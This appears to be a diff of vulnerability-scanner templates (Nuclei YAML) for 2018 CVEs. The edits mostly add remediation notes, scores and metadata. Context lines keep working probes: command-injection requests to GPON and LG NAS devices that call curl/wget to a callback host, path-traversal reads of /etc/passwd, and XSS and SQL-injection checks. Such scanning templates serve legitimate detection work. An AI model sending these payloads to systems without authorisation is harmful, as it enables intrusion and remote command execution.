reference: - https://www.synacktiv.com/ressources/zend_server_9_1_3_xss.pdf - https://www.zend.com/en/products/server/release-notes @@ -15,9 +17,14 @@ info: cvss-score: 6.1 cve-id: CVE-2018-10230 cwe-id: CWE-79 - tags: cve,cve2018,xss,zend + epss-score: 0.00122 + epss-percentile: 0.46234 + cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: zend + product: zend_server + tags: cve,cve2018,xss,zend http: - method: GET @@ -42,4 +49,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/18 +# digest: 490a004630440220078a25c70e6aec394082287508dc3e44c6967f4c5103e5bdcdecfb2f0000a95602206fe405aa14cc610f73181cb7d1032f71476a0cc712909421bb84e151215f6071:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-10562.yaml b/http/cves/2018/CVE-2018-10562.yaml index bd9c9b9bdf..19d7fd422f 100644 --- a/http/cves/2018/CVE-2018-10562.yaml +++ b/http/cves/2018/CVE-2018-10562.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Dasan GPON home routers are susceptible to command injection which can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: - https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router - https://github.com/f3d0x0/GPON/blob/master/gpon_rce.py @@ -15,10 +17,14 @@ info: cvss-score: 9.8 cve-id: CVE-2018-10562 cwe-id: CWE-78 - tags: cve,cve2018,dasan,gpon,rce,oast,kev + epss-score: 0.97499 + epss-percentile: 0.99973 + cpe: cpe:2.3:o:dasannetworks:gpon_router_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 - + vendor: dasannetworks + product: gpon_router_firmware + tags: cve,cve2018,dasan,gpon,rce,oast,kev variables: useragent: '{{rand_base(6)}}' @@ -29,7 +35,6 @@ http: Host: {{Hostname}} XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;busybox wget http://{{interactsh-url}}&ipv=0 - - | POST /GponForm/diag_Form?images/ HTTP/1.1 Host: {{Hostname}} @@ -37,10 +42,11 @@ http: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;wget http://{{interactsh-url}}&ipv=0 stop-at-first-match: true + matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" @@ -49,4 +55,4 @@ http: words: - "User-Agent: {{useragent}}" -# Enhanced by mp on 2022/05/12 +# digest: 4a0a0047304502210081e74ae80e7aed2cced08439a2780ad88a9b7f09b907d8ceb24f5fb2548e6837022032a9246fe2973294140526948d68172190283dbd1432e46f965674425b074402:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-10818.yaml b/http/cves/2018/CVE-2018-10818.yaml index 1edb70826f..68e9b68b7e 100644 --- a/http/cves/2018/CVE-2018-10818.yaml +++ b/http/cves/2018/CVE-2018-10818.yaml @@ -5,16 +5,17 @@ info: author: gy741 severity: critical description: LG NAS devices contain a pre-auth remote command injection via the "password" parameter. + remediation: | + Apply the latest firmware update provided by LG to mitigate this vulnerability. reference: - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/ - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10818 classification: cve-id: CVE-2018-10818 - tags: cve,cve2018,lg-nas,rce,oast,injection metadata: max-request: 2 - + tags: cve,cve2018,lg-nas,rce,oast,injection variables: useragent: '{{rand_base(6)}}' @@ -26,7 +27,6 @@ http: Content-Type: application/x-www-form-urlencoded &uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' - - | POST /en/php/usb_sync.php HTTP/1.1 Host: {{Hostname}} @@ -35,10 +35,11 @@ http: &act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' stop-at-first-match: true + matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" @@ -47,4 +48,4 @@ http: words: - "User-Agent: {{useragent}}" -# Enhanced by mp on 2022/04/26 +# digest: 4a0a00473045022100ccb2d026c1bdc3df10c2c02d7bc19b1059c4e40e9ba5b5dcd07f77a4900f0e1502203ebc6f5387949a63d6f6166a279ef005ec5bec4c4caaf3df125ce8265eb44bc5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-10822.yaml b/http/cves/2018/CVE-2018-10822.yaml index c8a1f22abe..c9bf854e60 100644 --- a/http/cves/2018/CVE-2018-10822.yaml +++ b/http/cves/2018/CVE-2018-10822.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request to the web interface. + remediation: | + Apply the latest firmware update provided by D-Link to fix the vulnerability reference: - https://www.exploit-db.com/exploits/45678 - http://sploit.tech/2018/10/12/D-Link.html @@ -15,9 +17,14 @@ info: cvss-score: 7.5 cve-id: CVE-2018-10822 cwe-id: CWE-22 - tags: dlink,edb,seclists,cve,cve2018,lfi,router + epss-score: 0.12286 + epss-percentile: 0.94782 + cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dlink + product: dwr-116_firmware + tags: dlink,edb,seclists,cve,cve2018,lfi,router http: - method: GET @@ -26,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/19 +# digest: 490a00463044022038a83452748f98269d48f6af6a964e3e68e62fcf3c2c94aa756be8b2a17623d802204799180130c3e372c4293b7a85d2cad9b6782c1e2abe3f2f5ccaadf6c3a37b38:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-10823.yaml b/http/cves/2018/CVE-2018-10823.yaml index c79a098cb8..bcd17e2d2e 100644 --- a/http/cves/2018/CVE-2018-10823.yaml +++ b/http/cves/2018/CVE-2018-10823.yaml @@ -6,6 +6,8 @@ info: severity: high description: | D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 device may allow an authenticated attacker to execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals. + remediation: | + Apply the latest firmware update provided by D-Link to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/45676 - https://nvd.nist.gov/vuln/detail/CVE-2018-10823 @@ -16,9 +18,14 @@ info: cvss-score: 8.8 cve-id: CVE-2018-10823 cwe-id: CWE-78 - tags: cve2018,rce,iot,dlink,router,edb,seclists,cve + epss-score: 0.96827 + epss-percentile: 0.99572 + cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dlink + product: dwr-116_firmware + tags: cve2018,rce,iot,dlink,router,edb,seclists,cve http: - method: GET @@ -27,7 +34,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/19 +# digest: 4b0a0048304602210092e17488094751160b38adf791762a3d5379a6053d7bf661c64141e43751eb4e022100fd9709cbb030f2d26ea48bce2481f5b43f2c0522d8e444783185fa5f7ea516b7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml index b835e0980d..2c9dd0e60d 100644 --- a/http/cves/2018/CVE-2018-10956.yaml +++ b/http/cves/2018/CVE-2018-10956.yaml @@ -6,6 +6,8 @@ info: severity: high description: | IPConfigure Orchid Core VMS 2.0.5 is susceptible to local file inclusion. + remediation: | + Update to the latest version of IPConfigure Orchid Core VMS to mitigate the LFI vulnerability. reference: - https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/ - https://github.com/nettitude/metasploit-modules/blob/master/orchid_core_vms_directory_traversal.rb @@ -16,8 +18,13 @@ info: cvss-score: 7.5 cve-id: CVE-2018-10956 cwe-id: CWE-22 + epss-score: 0.65072 + epss-percentile: 0.97526 + cpe: cpe:2.3:a:ipconfigure:orchid_core_vms:2.0.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: ipconfigure + product: orchid_core_vms shodan-query: http.title:"Orchid Core VMS" tags: cve,cve2018,orchid,vms,lfi,edb @@ -36,4 +43,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/19 +# digest: 4a0a00473045022013c72f30c4558f22385f7630d1c18aea21d513a50b19c0a332a52d533e3b1053022100ae9ad7558608b4538265bcddd2a64e2afa695b2383fb51f0993bf82e6d34169c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-11227.yaml b/http/cves/2018/CVE-2018-11227.yaml index adeefb5650..bdad87c1f2 100644 --- a/http/cves/2018/CVE-2018-11227.yaml +++ b/http/cves/2018/CVE-2018-11227.yaml @@ -6,19 +6,27 @@ info: severity: medium description: | Monstra CMS 3.0.4 and earlier contains a cross-site scripting vulnerability via index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade Monstra CMS to a version higher than 3.0.4 or apply the official patch provided by the vendor. reference: - https://github.com/monstra-cms/monstra/issues/438 - https://www.exploit-db.com/exploits/44646 - https://nvd.nist.gov/vuln/detail/CVE-2018-11227 + - https://github.com/monstra-cms/monstra/issues classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-11227 cwe-id: CWE-79 + epss-score: 0.02667 + epss-percentile: 0.89247 + cpe: cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.favicon.hash:419828698 verified: true + max-request: 1 + vendor: monstra + product: monstra_cms + shodan-query: http.favicon.hash:419828698 tags: cve,cve2018,xss,mostra,mostracms,cms,edb http: @@ -37,8 +45,8 @@ http: words: - ">" - "Monstra" - condition: and case-insensitive: true + condition: and - type: word part: header @@ -49,4 +57,4 @@ http: status: - 200 -# Enhanced by md on 2023/01/30 +# digest: 4a0a004730450220288c05ce5a5ae0bab4e3387a69060a87e768ff2dfa65bb06330ed45923c2eacc02210092d85ac5ee20c45f738cb58b484a75e955bbcc68a30b20abbe1fb4cf8fe17671:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-11231.yaml b/http/cves/2018/CVE-2018-11231.yaml index e06e44d201..ca2ff968f0 100644 --- a/http/cves/2018/CVE-2018-11231.yaml +++ b/http/cves/2018/CVE-2018-11231.yaml @@ -6,6 +6,8 @@ info: severity: high description: | OpenCart Divido plugin is susceptible to SQL injection + remediation: | + Apply the official patch or upgrade to a version that includes the fix. reference: - https://web.archive.org/web/20220331072310/http://foreversong.cn/archives/1183 - https://nvd.nist.gov/vuln/detail/CVE-2018-11231 @@ -15,10 +17,15 @@ info: cvss-score: 8.1 cve-id: CVE-2018-11231 cwe-id: CWE-89 - tags: cve,cve2018,opencart,sqli + epss-score: 0.00903 + epss-percentile: 0.80966 + cpe: cpe:2.3:a:divido:divido:-:*:*:*:*:opencart:*:* metadata: max-request: 1 - + vendor: divido + product: divido + framework: opencart + tags: cve,cve2018,opencart,sqli,intrusive variables: num: "999999999" @@ -32,16 +39,16 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - - type: word part: body words: - - '{{md5({{num}})}}' + - "{{md5({{num}})}}" - type: status status: - 200 -# Enhanced by mp on 2022/06/19 +# digest: 4a0a0047304502202ef0a60005868aac93a54b4f9ebabcf323f4de53f2f1c52e04ae4dc0808238ba0221008d9463862f86695163ef0534068d497012e02abaeef2f5ed657a286707781903:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-11409.yaml b/http/cves/2018/CVE-2018-11409.yaml index 8585e49182..b2bef05ea4 100644 --- a/http/cves/2018/CVE-2018-11409.yaml +++ b/http/cves/2018/CVE-2018-11409.yaml @@ -5,32 +5,42 @@ info: author: harshbothra_ severity: medium description: Splunk through 7.0.1 is susceptible to information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key. + remediation: | + Upgrade Splunk to a version higher than 7.0.1 to mitigate the vulnerability. reference: - https://github.com/kofa2002/splunk - https://www.exploit-db.com/exploits/44865/ - http://web.archive.org/web/20211208114213/https://securitytracker.com/id/1041148 - https://nvd.nist.gov/vuln/detail/CVE-2018-11409 + - http://www.securitytracker.com/id/1041148 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2018-11409 cwe-id: CWE-200 - tags: edb,cve,cve2018,splunk + epss-score: 0.9461 + epss-percentile: 0.98999 + cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: splunk + product: splunk + tags: edb,cve,cve2018,splunk http: - method: GET path: - '{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json' - '{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json' + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word words: - licenseKeys -# Enhanced by md on 2023/01/30 + - type: status + status: + - 200 + +# digest: 4a0a00473045022100cdc0f18fa6c094f2f092ba7734be1064f075c85241546afe780641a4ce2a9b13022026e1339b99504905ac2716f4eec4e239d8a0f509eb99727f966acd0555616525:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-11473.yaml b/http/cves/2018/CVE-2018-11473.yaml index b41176d8f4..dc8c9b048f 100644 --- a/http/cves/2018/CVE-2018-11473.yaml +++ b/http/cves/2018/CVE-2018-11473.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Monstra CMS 3.0.4 contains a cross-site scripting vulnerability via the registration form (i.e., the login parameter to users/registration). An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to the latest version of Monstra CMS or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://github.com/monstra-cms/monstra/issues/446 - https://github.com/nikhil1232/Monstra-CMS-3.0.4-XSS-ON-Registration-Page @@ -15,10 +17,15 @@ info: cvss-score: 6.1 cve-id: CVE-2018-11473 cwe-id: CWE-79 + epss-score: 0.00097 + epss-percentile: 0.40346 + cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: http.favicon.hash:419828698 verified: true + max-request: 2 + vendor: monstra + product: monstra + shodan-query: http.favicon.hash:419828698 tags: cve,cve2018,xss,mostra,mostracms,cms http: @@ -26,7 +33,6 @@ http: - | GET /users/registration HTTP/1.1 Host: {{Hostname}} - - | POST /users/registration HTTP/1.1 Host: {{Hostname}} @@ -35,6 +41,7 @@ http: csrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test®ister=Register cookie-reuse: true + matchers-condition: and matchers: - type: word @@ -42,8 +49,8 @@ http: words: - ">" - "Monstra" - condition: and case-insensitive: true + condition: and - type: word part: header @@ -57,10 +64,10 @@ http: extractors: - type: regex name: csrf - part: body group: 1 regex: - 'id="csrf" name="csrf" value="(.*)">' internal: true + part: body -# Enhanced by md on 2023/01/30 +# digest: 4b0a00483046022100be81a91262e05a32979f0be76a30b41385f94af82ba2aea5ed2aa89b8c725450022100d94e18a887509e427812db9b938d28088cd726dc2c57b337c5551929ae70396d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-11709.yaml b/http/cves/2018/CVE-2018-11709.yaml index eee5aaeef9..87c632ec28 100644 --- a/http/cves/2018/CVE-2018-11709.yaml +++ b/http/cves/2018/CVE-2018-11709.yaml @@ -5,18 +5,27 @@ info: author: daffainfo severity: medium description: WordPress wpForo Forum plugin before 1.4.12 for WordPress allows unauthenticated reflected cross-site scripting via the URI. + remediation: | + Update to the latest version of the wpForo Forum plugin (1.4.11) or apply the vendor-provided patch to fix the vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-11709 - https://wordpress.org/plugins/wpforo/#developers - https://wpvulndb.com/vulnerabilities/9090 + - https://blog.dewhurstsecurity.com/2018/06/01/wp-foro-wordpress-plugin-xss-vulnerability.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-11709 cwe-id: CWE-79 - tags: cve,cve2018,wordpress,xss,wp-plugin + epss-score: 0.00151 + epss-percentile: 0.51088 + cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: gvectors + product: wpforo_forum + framework: wordpress + tags: cve,cve2018,wordpress,xss,wp-plugin http: - method: GET @@ -26,9 +35,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -39,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/31 +# digest: 490a004630440220276031061d6524e6d59da77809d9f275123c413f96262dcdb873b3c54975f3da0220109b3508f42fcb195a1a7b46cf8d2759b0adc2989a8dc73c881a36e2b434855e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-11759.yaml b/http/cves/2018/CVE-2018-11759.yaml index dbdc480de9..81fffb3928 100644 --- a/http/cves/2018/CVE-2018-11759.yaml +++ b/http/cves/2018/CVE-2018-11759.yaml @@ -6,19 +6,26 @@ info: severity: high description: | Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 allows specially constructed requests to expose application functionality through the reverse proxy. It is also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. While there is some overlap between this issue and CVE-2018-1323, they are not identical. + remediation: | + Upgrade to a patched version of Apache Tomcat JK Connect (1.2.45 or higher) or apply the recommended security patches. reference: - https://github.com/immunIT/CVE-2018-11759 - https://lists.apache.org/thread.html/6d564bb0ab73d6b3efdd1d6b1c075d1a2c84ecd84a4159d6122529ad@%3Cannounce.tomcat.apache.org%3E - - http://web.archive.org/web/20210518152646/https://www.securityfocus.com/bid/105888 - https://lists.debian.org/debian-lts-announce/2018/12/msg00007.html - https://nvd.nist.gov/vuln/detail/CVE-2018-11759 + - https://access.redhat.com/errata/RHSA-2019:0366 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-11759 cwe-id: CWE-22 + epss-score: 0.97434 + epss-percentile: 0.99926 + cpe: cpe:2.3:a:apache:tomcat_jk_connector:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: apache + product: tomcat_jk_connector shodan-query: title:"Apache Tomcat" tags: cve,cve2018,apache,tomcat,httpd,mod-jk @@ -37,3 +44,5 @@ http: - type: status status: - 200 + +# digest: 4b0a00483046022100c83ca1fd96057c0ffede1f8d7de730b9e11dd02aaa3d7c732c8aa0f74a4518c2022100a0d6492e19507a693e27d8e2f163f2825c1a1cc76ff031ed005456d7e1ee3ed2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-11776.yaml b/http/cves/2018/CVE-2018-11776.yaml index 93c22ef257..9b9a6d5178 100644 --- a/http/cves/2018/CVE-2018-11776.yaml +++ b/http/cves/2018/CVE-2018-11776.yaml @@ -6,19 +6,27 @@ info: severity: high description: | Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible remote code execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn''t have value and action set and in same time, its upper package have no or wildcard namespace. + remediation: | + Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2. reference: - https://github.com/jas502n/St2-057 - https://cwiki.apache.org/confluence/display/WW/S2-057 - https://security.netapp.com/advisory/ntap-20180822-0001/ - https://nvd.nist.gov/vuln/detail/CVE-2018-11776 + - http://packetstormsecurity.com/files/172830/Apache-Struts-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2018-11776 cwe-id: CWE-20 - tags: cve,cve2018,apache,rce,struts,kev + epss-score: 0.97557 + epss-percentile: 0.99996 + cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: struts + tags: packetstorm,cve,cve2018,apache,rce,struts,kev http: - method: GET @@ -27,7 +35,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +43,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/19 +# digest: 4a0a00473045022100b0cd8d13c1cee90da676bfd6993ba15ff8dad3b3b3432625a50d7791bbaccb3a02204535600ec4282e7c751dc4b04cb2559e457651256a830d05c8051f4af6914c77:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-11784.yaml b/http/cves/2018/CVE-2018-11784.yaml index 928d2943b8..52070c79e3 100644 --- a/http/cves/2018/CVE-2018-11784.yaml +++ b/http/cves/2018/CVE-2018-11784.yaml @@ -6,19 +6,28 @@ info: severity: medium description: | Apache Tomcat versions prior to 9.0.12, 8.5.34, and 7.0.91 are prone to an open-redirection vulnerability because it fails to properly sanitize user-supplied input. + remediation: | + Upgrade to Apache Tomcat version 9.0.12 or later, or apply the relevant patch provided by the Apache Software Foundation. reference: - https://lists.apache.org/thread.html/23134c9b5a23892a205dc140cdd8c9c0add233600f76b313dda6bd75@%3Cannounce.tomcat.apache.org%3E - https://nvd.nist.gov/vuln/detail/CVE-2018-11784 - - http://web.archive.org/web/20210509082244/https://www.securityfocus.com/bid/105524 + - http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00030.html + - http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00056.html + - http://packetstormsecurity.com/files/163456/Apache-Tomcat-9.0.0M1-Open-Redirect.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N cvss-score: 4.3 cve-id: CVE-2018-11784 cwe-id: CWE-601 + epss-score: 0.96735 + epss-percentile: 0.99541 + cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: tomcat shodan-query: title:"Apache Tomcat" - tags: tomcat,redirect,cve,cve2018,apache + tags: packetstorm,tomcat,redirect,cve,cve2018,apache http: - method: GET @@ -28,11 +37,13 @@ http: matchers-condition: and matchers: - type: regex + part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - part: header - type: status + negative: true status: - 404 - negative: true + +# digest: 4b0a00483046022100b99f1f4b609c8ee637c860c2ccbbadf49793adaa8662151c06273c3b7aed70c902210094543f706d19694abf8ee712dc7888e4c6f3b0e6543a46cce3f4c92085033e08:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml index e6a846c747..e4bc75b13e 100644 --- a/http/cves/2018/CVE-2018-12031.yaml +++ b/http/cves/2018/CVE-2018-12031.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: Eaton Intelligent Power Manager v1.6 allows an attacker to include a file via directory traversal, which can lead to sensitive information disclosure, denial of service and code execution. + remediation: | + Apply the latest security patch or upgrade to a newer version of Eaton Intelligent Power Manager to mitigate this vulnerability. reference: - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion - https://www.exploit-db.com/exploits/48614 @@ -14,9 +16,14 @@ info: cvss-score: 9.8 cve-id: CVE-2018-12031 cwe-id: CWE-22 - tags: edb,cve,cve2018,lfi + epss-score: 0.01411 + epss-percentile: 0.85025 + cpe: cpe:2.3:a:eaton:intelligent_power_manager:1.6:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: eaton + product: intelligent_power_manager + tags: edb,cve,cve2018,lfi http: - method: GET @@ -27,13 +34,14 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or - part: body + - type: status status: - 200 -# Enhanced by mp on 2022/05/12 +# digest: 4b0a00483046022100a173dfd50a57c5bfe9a6f0bdd25255103febe2084ec60034794ac049f62a091a022100f2cc3ac8aa07210c5ad91e6f4c67a19f0684bcb83153f847b38c48895b059515:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12054.yaml b/http/cves/2018/CVE-2018-12054.yaml index d56a1862bf..d0f2489c29 100644 --- a/http/cves/2018/CVE-2018-12054.yaml +++ b/http/cves/2018/CVE-2018-12054.yaml @@ -5,6 +5,8 @@ info: author: wisnupramoedya severity: high description: Schools Alert Management Script is susceptible to an arbitrary file read vulnerability via the f parameter in img.php, aka absolute path traversal. + remediation: | + Apply the latest patch or update provided by the vendor to fix the arbitrary file read vulnerability in the Schools Alert Management Script. reference: - https://www.exploit-db.com/exploits/44874 - https://nvd.nist.gov/vuln/detail/CVE-2018-12054 @@ -15,9 +17,14 @@ info: cvss-score: 7.5 cve-id: CVE-2018-12054 cwe-id: CWE-22 - tags: cve,cve2018,lfi,edb + epss-score: 0.43824 + epss-percentile: 0.96954 + cpe: cpe:2.3:a:schools_alert_management_script_project:schools_alert_management_script:-:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: schools_alert_management_script_project + product: schools_alert_management_script + tags: cve,cve2018,lfi,edb http: - method: GET @@ -26,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/26 +# digest: 4a0a0047304502203c39ab52f948b7050a8ddeba0a8d02ac72cb3c3cd6336ee689480641abe979f90221008d182b00d53f831d062be24c52fb8c92ba76c69eaacc0e93ce5a56e4c51c1c27:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1207.yaml b/http/cves/2018/CVE-2018-1207.yaml index e0b78e7118..65564b905c 100644 --- a/http/cves/2018/CVE-2018-1207.yaml +++ b/http/cves/2018/CVE-2018-1207.yaml @@ -8,28 +8,37 @@ info: Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain a CGI injection vulnerability which could be used to execute remote code. A remote unauthenticated attacker may potentially be able to use CGI variables to execute remote code. + remediation: | + Apply the latest firmware updates provided by Dell to mitigate this vulnerability. reference: - https://downloads.dell.com/solutions/dell-management-solution-resources/iDRAC_CVE%201207_1211_1000116.pdf - https://github.com/KraudSecurity/Exploits/blob/master/CVE-2018-1207/CVE-2018-1207.py - https://nvd.nist.gov/vuln/detail/CVE-2018-1207 - http://en.community.dell.com/techcenter/extras/m/white_papers/20485410 + - https://twitter.com/nicowaisman/status/977279766792466432 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-1207 cwe-id: CWE-94 - tags: cve,cve2018,dell,injection,rce + epss-score: 0.01875 + epss-percentile: 0.87111 + cpe: cpe:2.3:a:dell:emc_idrac7:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dell + product: emc_idrac7 + tags: cve,cve2018,dell,injection,rce http: - method: GET path: - "{{BaseURL}}/cgi-bin/login?LD_DEBUG=files" + matchers: - type: word + part: response words: - "calling init: /lib/" - part: response -# Enhanced by mp on 2022/05/12 +# digest: 4a0a00473045022100e51be2833725ca8af03b29b62a9849674d20569ab625ca8e8cb42049619070350220505b94a31d140ffd026a441722342792417b34827b960473a0ce6a5180962a37:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-12095.yaml b/http/cves/2018/CVE-2018-12095.yaml index 46608f3da5..8327a171f9 100644 --- a/http/cves/2018/CVE-2018-12095.yaml +++ b/http/cves/2018/CVE-2018-12095.yaml @@ -5,6 +5,8 @@ info: author: LogicalHunter severity: medium description: OEcms 3.1 is vulnerable to reflected cross-site scripting via the mod parameter of info.php. + remediation: | + Apply the latest patch or upgrade to a newer version of OEcms to fix the XSS vulnerability. reference: - https://www.exploit-db.com/exploits/44895 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095 @@ -15,9 +17,14 @@ info: cvss-score: 5.4 cve-id: CVE-2018-12095 cwe-id: CWE-79 - tags: cve,cve2018,xss,edb + epss-score: 0.00407 + epss-percentile: 0.70907 + cpe: cpe:2.3:a:oecms_project:oecms:3.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: oecms_project + product: oecms + tags: cve,cve2018,xss,edb http: - 